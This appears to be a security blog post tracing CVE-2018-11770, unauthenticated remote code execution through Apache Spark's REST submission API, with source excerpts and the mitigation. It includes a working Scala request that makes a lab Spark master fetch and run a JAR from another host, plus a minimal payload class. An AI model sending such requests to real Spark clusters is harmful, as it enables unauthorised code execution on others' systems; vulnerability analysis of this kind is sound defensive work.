In November 2018, Metasploit committer and community member Green-m submitted a module for “spark_unauth_rce”. Apache Spark is an open-source cluster-computing framework that was originally developed at UC Berkeley’s AMPLab and is maintained by the Apache Software Foundation. It is primarily written in Scala and is designed to be a fast, unified analytics engine for large-scale data processing. It is common in enterprise environments, which always catches our attention. Researcher Fengwei Zhang of Alibaba’s cloud security team discovered that the REST API’s CreateSubmissionRequest can be abused in standalone mode to allow unauthenticated users to submit malicious code, resulting in remote code execution. According to Apache Spark's security issue list, this vulnerability was assigned CVE-2018-11770.

Vulnerability Analysis

According to the Apache Software Foundation, versions from 1.3.0 onward running a standalone master with the REST API enabled are vulnerable, as are versions running a Mesos master with cluster mode enabled. For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:

$ git clone https://github.com/vulhub/vulhub.git
$ cd vulhub/spark/unacc
$ docker-compose up -d
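Once the containers are up, it's worth confirming that the REST submission port (6066 by default) is actually exposed before going further. Here is a minimal sketch in Scala; the host 127.0.0.1 is an assumption for a local lab:

import java.net.Socket
import scala.util.Try

// Minimal reachability check for the standalone master's REST submission port.
// The host (127.0.0.1) and port (6066) are assumptions for a local vulhub lab.
object RestPortCheck {
  def main(args: Array[String]): Unit = {
    val open = Try { new Socket("127.0.0.1", 6066).close(); true }.getOrElse(false)
    println(if (open) "REST port 6066 is open" else "REST port 6066 is not reachable")
  }
}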

There’s a community-written walkthrough of manual installation for the Windows version here. The release notes for Apache Spark indicate that the vulnerability was patched in version 2.4.0, and you can see the corresponding Jira ticket here. The pull request can be found at #22071, where we learn the following specifics:

- The REST submission server is disabled by default in standalone mode.
- The standalone master fails to start if the REST server is enabled and an authentication secret is set.
- The Mesos cluster dispatcher fails to start if an authentication secret is set.
- When submitting a standalone application, REST submission is only tried first if spark.master.rest.enabled=true in the config file.

Apache Spark is well-documented, from release notes to Jira tickets and pull requests, so it doesn't take long to identify the code responsible for the insecure submission. Based on the patch, the culprit is the StandaloneRestServer class.

Abstract RestSubmissionServer

The StandaloneRestServer class actually extends the abstract RestSubmissionServer class, so we need to look at that first. The beginning of this class tells us how the URLs are mapped:

protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions"
protected lazy val contextToServlet = Map[String, RestServlet](
  s"$baseContext/create/*" -> submitRequestServlet,
  s"$baseContext/kill/*" -> killRequestServlet,
  s"$baseContext/status/*" -> statusRequestServlet,
  "/*" -> new ErrorServlet // default handler
)

The above tells us that if the server sees a request to /v1/submissions/create, it is routed to the submitRequestServlet class. Inside that class, there is a doPost function:

protected override def doPost(
    requestServlet: HttpServletRequest,
    responseServlet: HttpServletResponse): Unit = {
  val responseMessage =
    try {
      val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString
      val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson)
      // The response should have already been validated on the client.
      // In case this is not true, validate it ourselves to avoid potential NPEs.
      requestMessage.validate()
      handleSubmit(requestMessageJson, requestMessage, responseServlet)
    } catch {
      // The client failed to provide a valid JSON, so this is not our fault
      case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError("Malformed request: " + formatException(e))
    }
  sendResponse(responseMessage, responseServlet)
}

What this does is retrieve the request body from the stream, parse and validate it as a protocol message, and then pass it to a handleSubmit function. Anyone extending RestSubmissionServer has to implement handleSubmit.
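To make that concrete, here is a rough sketch of the kind of JSON a client could POST to /v1/submissions/create. This is not the Metasploit module's code; the hosts, ports, JAR URL, and class name are all hypothetical lab values, and the field set follows the CreateSubmissionRequest message we examine below:

import java.io.OutputStreamWriter
import java.net.{HttpURLConnection, URL}

// Sketch only: POSTs a CreateSubmissionRequest to a standalone master's REST port.
// All hosts, ports, and names below are hypothetical lab values.
object SubmitSketch {
  def main(args: Array[String]): Unit = {
    val payload =
      """{
        |  "action": "CreateSubmissionRequest",
        |  "clientSparkVersion": "2.3.1",
        |  "appArgs": [],
        |  "appResource": "http://192.168.1.20:8080/payload.jar",
        |  "environmentVariables": { "SPARK_ENV_LOADED": "1" },
        |  "mainClass": "Payload",
        |  "sparkProperties": {
        |    "spark.jars": "http://192.168.1.20:8080/payload.jar",
        |    "spark.app.name": "Payload",
        |    "spark.driver.supervise": "false",
        |    "spark.submit.deployMode": "cluster",
        |    "spark.master": "spark://192.168.1.10:6066"
        |  }
        |}""".stripMargin

    val conn = new URL("http://192.168.1.10:6066/v1/submissions/create")
      .openConnection().asInstanceOf[HttpURLConnection]
    conn.setRequestMethod("POST")
    conn.setRequestProperty("Content-Type", "application/json;charset=UTF-8")
    conn.setDoOutput(true)
    val out = new OutputStreamWriter(conn.getOutputStream)
    out.write(payload)
    out.close()
    println(s"HTTP ${conn.getResponseCode}")
  }
}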

StandaloneRestServer

Now that we have a basic understanding of the abstract class, we can look at the subclasses. StandaloneRestServer is one of those that extends RestSubmissionServer and seems to fit the description of the problem.

private[deploy] class StandaloneRestServer(
    host: String,
    requestedPort: Int,
    masterConf: SparkConf,
    masterEndpoint: RpcEndpointRef,
    masterUrl: String)
  extends RestSubmissionServer(host, requestedPort, masterConf)

It's also easy to identify what we should be looking at because of this line in the code:

protected override val submitRequestServlet =
  new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)

In StandaloneSubmitRequestServlet, we find the handleSubmit code we need:

protected override def handleSubmit(
    requestMessageJson: String,
    requestMessage: SubmitRestProtocolMessage,
    responseServlet: HttpServletResponse): SubmitRestProtocolResponse = {
  requestMessage match {
    case submitRequest: CreateSubmissionRequest =>
      val driverDescription = buildDriverDescription(submitRequest)
      val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
        DeployMessages.RequestSubmitDriver(driverDescription))
      val submitResponse = new CreateSubmissionResponse
      submitResponse.serverSparkVersion = sparkVersion
      submitResponse.message = response.message
      submitResponse.success = response.success
      submitResponse.submissionId = response.driverId.orNull
      val unknownFields = findUnknownFields(requestMessageJson, requestMessage)
      if (unknownFields.nonEmpty) {
        // If there are fields that the server does not know about, warn the client
        submitResponse.unknownFields = unknownFields
      }
      submitResponse
    case unexpected =>
      responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
      handleError(s"Received message of unexpected type ${unexpected.messageType}.")
  }
}

The BuildDriverDescription Call in handleSubmit

Looking at the code, the buildDriverDescription function seems interesting. To start with, it reveals what the appResource parameter means. The function is large, but it begins this way:

val appResource = Option(request.appResource).getOrElse {
  throw new SubmitRestMissingFieldException("Application jar is missing.")
}

Toward the end of the function, it is passed to DriverDescription:

new DriverDescription(
  appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)

When we look at the DriverDescription class, we understand appResource's purpose: it is a URL to a JAR file:

private[deploy] case class DriverDescription(
    jarUrl: String,
    mem: Int,
    cores: Int,
    supervise: Boolean,
    command: Command)

This means that when we create a submission request, we can pass a URL to a remote JAR, which dictates the attack vector. The buildDriverDescription function also contains clues about how the JAR is launched:

val command = new Command(
  "org.apache.spark.deploy.worker.DriverWrapper",
  Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs,
  environmentVariables, extraClassPath, extraLibraryPath, javaOpts)

The Command class is defined as follows:

private[spark] case class Command(
    mainClass: String,
    arguments: Seq[String],
    environment: Map[String, String],
    classPathEntries: Seq[String],
    libraryPathEntries: Seq[String],
    javaOpts: Seq[String]) { }

We see that the first argument is the main class, which in this case is org.apache.spark.deploy.worker.DriverWrapper. DriverWrapper is meant to invoke our main method:

val clazz = Utils.classForName(mainClass)
val mainMethod = clazz.getMethod("main", classOf[Array[String]])
mainMethod.invoke(null, extraArgs.toArray[String])
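Since DriverWrapper reflectively invokes whatever main method the submitted JAR exposes, anything inside it runs on the worker. As a minimal sketch, a hypothetical Payload object bundled into the JAR served at the appResource URL might look like this:

// Hypothetical proof-of-concept class packaged into the JAR served at the
// appResource URL. DriverWrapper reflectively calls main(), so this runs
// with the privileges of the Spark worker process.
object Payload {
  def main(args: Array[String]): Unit = {
    // Harmless marker command to demonstrate execution; an attacker could
    // run anything here.
    new ProcessBuilder("touch", "/tmp/spark-rce-poc").start().waitFor()
  }
}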

After the driver description is crafted, it is sent to the master in a RequestSubmitDriver message:

val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
  DeployMessages.RequestSubmitDriver(driverDescription))

RequestSubmitDriver

The handler for RequestSubmitDriver can be found in the receiveAndReply function in Master.scala:

case RequestSubmitDriver(description) =>
  if (state != RecoveryState.ALIVE) {
    val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " +
      "Can only accept driver submissions in ALIVE state."
    context.reply(SubmitDriverResponse(self, false, None, msg))
  } else {
    logInfo("Driver submitted " + description.command.mainClass)
    val driver = createDriver(description)
    persistenceEngine.addDriver(driver)
    waitingDrivers += driver
    drivers.add(driver)
    schedule()
    // ... code snipped ...
  }

In the else block, we see that a driver created from our description is added to the collection of waiting drivers before schedule() is called.

private def schedule(): Unit = {
  if (state != RecoveryState.ALIVE) {
    return
  }
  val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE))
  val numWorkersAlive = shuffledAliveWorkers.size
  var curPos = 0
  for (driver <- waitingDrivers.toList) { // iterate over a copy of waitingDrivers
    // Workers are assigned to waiting drivers in a round-robin fashion.
    var launched = false
    var numWorkersVisited = 0
    while (numWorkersVisited < numWorkersAlive && !launched) {
      val worker = shuffledAliveWorkers(curPos)
      numWorkersVisited += 1
      if (worker.memoryFree >= driver.desc.mem && worker.coresFree >= driver.desc.cores) {
        launchDriver(worker, driver)
        waitingDrivers -= driver
        launched = true
      }
      curPos = (curPos + 1) % numWorkersAlive
    }
  }
  startExecutorsOnWorkers()
}

Notice this launchDriver function. Looking further:

private def launchDriver(worker: WorkerInfo, driver: DriverInfo) {
  logInfo("Launching driver " + driver.id + " on worker " + worker.id)
  worker.addDriver(driver)
  driver.worker = Some(worker)
  worker.endpoint.send(LaunchDriver(driver.id, driver.desc))
  driver.state = DriverState.RUNNING
}

The code relies on the Worker class to launch the driver. We can find this in Worker.scala:

case LaunchDriver(driverId, driverDesc) =>
  logInfo(s"Asked to launch driver $driverId")
  val driver = new DriverRunner(
    conf,
    driverId,
    workDir,
    sparkHome,
    driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)),
    self,
    workerUri,
    securityMgr)
  drivers(driverId) = driver
  driver.start()

If you’re wondering what driver.start() does, you’re not alone. Since driver is a DriverRunner instance, that’s where we find the code.

DriverRunner

The purpose of DriverRunner is self-explanatory. The Worker class tells us we should be looking at the start() function; there is a lot of code for process setup and handling, which we’ll skip to get to the point. Tracing the calls leads from start() to prepareAndRunDriver(), to runDriver(), and finally to runCommandWithRetry(). The runCommandWithRetry() function then executes our code using ProcessBuilder:

private[worker] def runCommandWithRetry(
    command: ProcessBuilderLike,
    initialize: Process => Unit,
    supervise: Boolean): Int = {
  // ... code snipped ...
  synchronized {
    if (killed) { return exitCode }
    process = Some(command.start())
    initialize(process.get)
  }
  // ... code snipped ...
}

Now that we have found the code that executes our payload, we have the full picture of the execution flow: a CreateSubmissionRequest hits the REST server's doPost, handleSubmit builds a DriverDescription pointing at our remote JAR, the master's RequestSubmitDriver handler queues the driver and calls schedule(), launchDriver() assigns it to a worker, and the worker's DriverRunner ultimately executes it via ProcessBuilder.

Patch Notes

Apache indicated the vulnerability was patched in version 2.4.0 as of Aug. 14, 2018, but the fix it implemented was to “disable the REST API by setting spark.master.rest.enabled to false” and/or to “ensure that all network access to the REST API (port 6066 by default) is restricted to hosts that are trusted to submit jobs.” The fix, in other words, smells a whole lot more like a workaround than a true patch. We don't point this out because the fix was unreasonable or ineffective; on the contrary, software producers often call functional workarounds patches when true patching isn't a realistic or cost-effective option.

We would be remiss if we failed to mention that Apache Spark has quite a few beneficial software development habits that Metasploit appreciates and others may want to consider adopting. Throughout the review process, we noticed that PR numbers were attached to tickets whenever possible and that PR titles were properly labeled with Jira ticket numbers. Developers take the time to write detailed descriptions for their pull requests, and they devote genuine effort to ensuring reviewers understand them. This is rare in our experience. We also admired the dedication to thorough code review, the well-written release notes, the useful references, and the comments evident throughout the codebase.
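For completeness, the advisory's primary mitigation is a single master-side setting, alongside restricting network access to port 6066. A minimal sketch, assuming the default conf/spark-defaults.conf location under $SPARK_HOME:

# conf/spark-defaults.conf (assumed default location under $SPARK_HOME)
# Disable the standalone master's REST submission server:
spark.master.rest.enabled  false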